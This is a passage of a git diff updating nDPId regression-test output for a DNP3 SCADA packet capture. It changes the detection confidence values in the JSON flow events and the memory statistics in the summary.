+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097505644006,"flow_last_seen":1097505719035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":352,"packets-processed":351,"total-skipped-flows":0,"total-l4-payload-len":5682,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":4,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1097507785883} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097507785883,"flow_last_seen":1097507785883,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097507785883,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1097507785883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1097507785883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1097507785883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097507785883,"flow_last_seen":1097507785885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097507785885,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097507785883,"flow_last_seen":1097507785885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097507785885,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":445,"packets-processed":444,"total-skipped-flows":0,"total-l4-payload-len":7101,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":5,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":1097510947092} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097510947092,"flow_last_seen":1097510947092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1097510947092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1097510947092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1097510947092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097510947092,"flow_last_seen":1097510947094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097510947094,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1097510950374,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097510947092,"flow_last_seen":1097510947094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097510947094,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1097510950374,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":472,"packets-processed":471,"total-skipped-flows":0,"total-l4-payload-len":7296,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":6,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1097512255234} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097512255234,"flow_last_seen":1097512255234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1097512255234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} 
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1097512255234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1097512255234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097512255234,"flow_last_seen":1097512255236,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097512255236,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":496,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1097512264841,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097512255234,"flow_last_seen":1097512255236,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097512255236,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":496,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1097512264841,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":505,"packets-processed":504,"total-skipped-flows":0,"total-l4-payload-len":7593,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":7,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1097513177295} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097513177295,"flow_last_seen":1097513177295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097513177295,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1097513177295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} 
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1097513177295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1097513177295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097513177295,"flow_last_seen":1097513177297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097513177297,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097513177295,"flow_last_seen":1097513185107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1097510947092,"flow_last_seen":1097510959487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1097512255234,"flow_last_seen":1097512267645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097513177295,"flow_last_seen":1097513177297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097513177297,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097513177295,"flow_last_seen":1097513185107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1097510947092,"flow_last_seen":1097510959487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1097512255234,"flow_last_seen":1097512267645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":543,"packets-processed":543,"total-skipped-flows":0,"total-l4-payload-len":7788,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1097513185107} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 543/543 @@ -64,9 +64,9 @@ ~~ total active/idle flows...: 8/8 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5895106 bytes -~~ total memory freed........: 5895106 bytes -~~ total allocations/frees...: 118702/118702 +~~ total memory allocated....: 6028740 bytes +~~ total memory freed........: 6028740 bytes +~~ total allocations/frees...: 121464/121464 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 678 chars diff --git a/test/results/dns-invalid-chars.pcap.out b/test/results/dns-invalid-chars.pcap.out index 43ed2714f..d12e62462 100644 --- a/test/results/dns-invalid-chars.pcap.out +++ b/test/results/dns-invalid-chars.pcap.out 
